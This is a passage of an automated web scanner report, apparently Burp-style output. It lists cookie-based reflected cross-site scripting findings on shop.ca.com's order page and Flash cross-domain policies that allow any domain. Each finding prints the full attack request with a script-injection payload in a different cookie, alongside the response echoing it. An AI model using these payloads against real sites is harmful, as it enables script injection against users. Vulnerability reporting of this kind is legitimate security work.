Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=9328157--><script>alert(1)</script>38e08d480c7; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:44 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:44 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--DB(msRandX) :9328157--><script>alert(1)</script>38e08d480c7-->
...[SNIP]...
4.320. http://shop.ca.com/cgi-bin/order.asp [IS3_GSV cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the IS3_GSV cookie is copied into an HTML comment. The payload 245fd--><script>alert(1)</script>607b373e6c1 was submitted in the IS3_GSV cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com245fd--><script>alert(1)</script>607b373e6c1; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:48 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:49 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_GSV :DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com245fd--><script>alert(1)</script>607b373e6c1-->
...[SNIP]...
4.321. http://shop.ca.com/cgi-bin/order.asp [IS3_History cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the IS3_History cookie is copied into an HTML comment. The payload 60794--><script>alert(1)</script>59cf425ed97 was submitted in the IS3_History cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_060794--><script>alert(1)</script>59cf425ed97; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:48 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:48 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_History :1301114230-2-91_0--2__0_060794--><script>alert(1)</script>59cf425ed97-->
...[SNIP]...
4.322. http://shop.ca.com/cgi-bin/order.asp [SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 2093c--><script>alert(1)</script>bc9b73c274d was submitted in the SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=13103492201104170854451731932142432093c--><script>alert(1)</script>bc9b73c274d; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:42 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:42 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--SessionId :13103492201104170854451731932142432093c--><script>alert(1)</script>bc9b73c274d-->
...[SNIP]...
4.323. http://shop.ca.com/cgi-bin/order.asp [__utma cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utma cookie is copied into an HTML comment. The payload 3c513--><script>alert(1)</script>9351f2fd952 was submitted in the __utma cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.13c513--><script>alert(1)</script>9351f2fd952; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:50 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:50 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.13c513--><script>alert(1)</script>9351f2fd952-->
...[SNIP]...
4.324. http://shop.ca.com/cgi-bin/order.asp [__utmb cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utmb cookie is copied into an HTML comment. The payload 51af8--><script>alert(1)</script>a2ecb59f772 was submitted in the __utmb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.130304488651af8--><script>alert(1)</script>a2ecb59f772; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:52 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:53 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmb :36441954.3.10.130304488651af8--><script>alert(1)</script>a2ecb59f772-->
...[SNIP]...
4.325. http://shop.ca.com/cgi-bin/order.asp [__utmc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utmc cookie is copied into an HTML comment. The payload 53f6b--><script>alert(1)</script>ab4bcb782ce was submitted in the __utmc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=3644195453f6b--><script>alert(1)</script>ab4bcb782ce; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Length: 16117
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:50 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:51 GMT
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmc :3644195453f6b--><script>alert(1)</script>ab4bcb782ce-->
...[SNIP]...
4.326. http://shop.ca.com/cgi-bin/order.asp [__utmz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the __utmz cookie is copied into an HTML comment. The payload 24b21--><script>alert(1)</script>4c24d71b7ea was submitted in the __utmz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)24b21--><script>alert(1)</script>4c24d71b7ea; Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:42 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:43 GMT
Content-Length: 16117
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmz(36441954.1303:(direct)|utmccn=(direct)|utmcmd=(none)24b21--><script>alert(1)</script>4c24d71b7ea-->
...[SNIP]...
4.327. http://shop.ca.com/cgi-bin/order.asp [_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the _clogin cookie is copied into an HTML comment. The payload 88fd3--><script>alert(1)</script>2233c94e72c was submitted in the _clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=130304693945288fd3--><script>alert(1)</script>2233c94e72c;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Length: 16117
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:54 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:54 GMT
Connection: close
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--_clogin(e) :130304693945288fd3--><script>alert(1)</script>2233c94e72c-->
...[SNIP]...
5. Flash cross-domain policy  previous  next
There are 8 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

5.1. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sun, 17 Apr 2011 12:53:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.2. http://images.dealer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images.dealer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: images.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/v8/widgets/generic/image/simple-slideshow.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
